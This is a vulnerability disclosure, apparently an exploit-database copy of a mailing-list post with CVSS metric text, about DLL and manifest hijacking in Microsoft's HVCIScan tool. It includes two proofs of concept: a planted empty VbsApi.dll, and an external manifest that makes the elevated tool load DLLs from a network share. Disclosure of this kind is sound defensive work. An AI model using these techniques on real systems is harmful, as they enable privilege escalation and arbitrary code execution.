The vulnerable system is not bound to the network stack and the attacker’s path is via read/write/execute capabilities. Either: the attacker exploits the vulnerability by accessing the target system locally (e.g., keyboard, console), or through terminal emulation (e.g., SSH); or the attacker relies on User Interaction by another person to perform actions required to exploit the vulnerability (e.g., using social engineering techniques to trick a legitimate user into opening a malicious document).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
None
PR
The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
High
C
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity
None
I
There is no impact on the integrity of the system; the attacker does not gain the ability to modify any files or information on the target system.
Availability
None
A
There is no impact on the availability of the system; the attacker does not have the ability to disrupt access to or use of the system.
Hi @ll,
about a month ago Microsoft published HVCIScan-{amd,arm}64.exe, a
"Tool to check devices for compatibility with memory integrity (HVCI)"
The "Install instructions" on the download page
<https://www.microsoft.com/en-us/download/105217> tell:
| Download the hvciscan.exe for your system architecture (AMD64 or ARM64).
| From an elevated command window or PowerShell, run hvciscan.exe
"ELEVATED" sounds good, especially when such a vulnerable tool is run
from the "Downloads" folder, where a file HVCIScan_amd64.exe.manifest,
HVCIScan_arm64.exe.manifest or VBSAPI.dll can be placed via "drive-by"
download or by the (unsuspecting) unelevated user who still abuses the
"protected administrator" account created during Windows setup.
Oops, one step back: how did I determine
a) that HVCIScan-*.exe is vulnerable
b) these filenames?
Open an UNELEVATED command window and run
LINK.exe /DUMP /DEPENDENTS /LOADCONFIG /SUMMARY HVCIScan_amd64.exe
and/or
LINK.exe /DUMP /DEPENDENTS /LOADCONFIG /SUMMARY HVCIScan_arm64.exe
then inspect the output.
| Dump of file HVCIScan_amd64.exe
|
| File Type: EXECUTABLE IMAGE
|
| Image has the following dependencies:
|
| KERNEL32.dll
| msvcrt.dll
| VbsApi.dll
~~~~~~~~~~
| Section contains the following load config:
|
...
| 0000 Dependend load flags
...
| Summary
|
| 1000 .data
| 1000 .pdata
| 2000 .rdata
| 1000 .reloc
| 1000 .text
OUCH: the guys at M$FT built these tools without embedded "application
manifest" (which would have been placed in a ".rsrc" section),
so Windows will apply an external "application manifest", and
without /DEPENDENTLOADFLAG:2048, so Windows will search dependent
DLLs not listed as "Known DLL" in the "application directory"
first.
Both omissions^WBEGINNER'S MISTAKES allow to load and execute ARBITRARY
DLLs from ARBITRARY paths that run with the (ELEVATED) credentials of
the application!
"Trustworthy Computing" anyone? Or "Security Development Lifecycle"?
<https://www.microsoft.com/en-us/securityengineering/sdl>
Proof of concept #1:
~~~~~~~~~~~~~~~~~~~~
a) Open an UNELEVATED command window in the directory where you saved
HVCISCAN_amd64.exe respectively HVCISCAN_arm64.exe
b) Create an empty file VbsApi.dll next to the executable:
COPY NUL: VbsApi.dll
c) Run HVCISCAN_amd64.exe or HVCISCAN_arm64.exe and admire the error
message that VbsApi.dll can't be loaded.
Building a VbsApi.dll with the exports required by HVCIScan-a??64.exe
to actually load and execute VbsApi.dll is left as an exercise to the
reader.
See <https://skanthak.homepage.t-online.de/minesweeper.html> if you
need help.
Proof of concept #2:
~~~~~~~~~~~~~~~~~~~~
a) Create the text file HVCISCAN_amd64.exe.manifest respectively
HVCISCAN_arm64.exe.manifest with the following content next to
HVCISCAN_amd64.exe respectively HVCISCAN_arm64.exe:
--- HVCISCAN_a??64.exe.manifest ---
<?xml version="1.0" encoding="UTF-8" standalone="yes" ?>
<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">
<file loadFrom="\\SERVER\SHARE\arbitrary.dll" name="KERNEL32.dll" />
<file loadFrom="\\SERVER\SHARE\arbitrary.dll" name="msvcrt.dll" />
<file loadFrom="\\SERVER\SHARE\arbitrary.dll" name="VbsApi.dll" />
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
--- EOF ---
Replace the UNC path \\SERVER\SHARE\arbitrary.dll with any local or
remote path where you can create the specified file.
NOTE: the section "trustInfo" is optional.
NOTE: KERNEL32.dll and MSVCRT.dll are "Known DLLs".
b) Create an empty file arbitrary.dll in the specified network share or
local directory:
COPY NUL: \\SERVER\SHARE\arbitrary.dll
c) Run HVCISCAN_amd64.exe or HVCISCAN_arm64.exe and admire the error
message that a required DLL or an entry point is not found.
Building \\SERVER\SHARE\arbitrary.dll with the exports required by
HVCIScan-a??64.exe to actually load and execute arbitrary.dll is left
as an exercise to the reader.
stay tuned, and far away from "tools" made in Redmond
Stefan Kanthak
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum